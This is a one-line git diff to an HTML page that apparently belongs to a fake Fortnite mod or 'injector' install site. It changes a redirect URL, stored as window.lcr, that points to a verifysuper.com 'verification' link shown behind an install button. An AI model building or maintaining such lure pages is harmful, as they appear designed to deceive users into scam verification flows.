--- a/itweakvip/OGInject/s4.html
+++ b/itweakvip/OGInject/s4.html
@@ -134,7 +134,7 @@ Fortnite is an online video game developed by Epic Games and released in 2017. I
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=c4cb60840d8ca405224b7afe98cf38a5";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
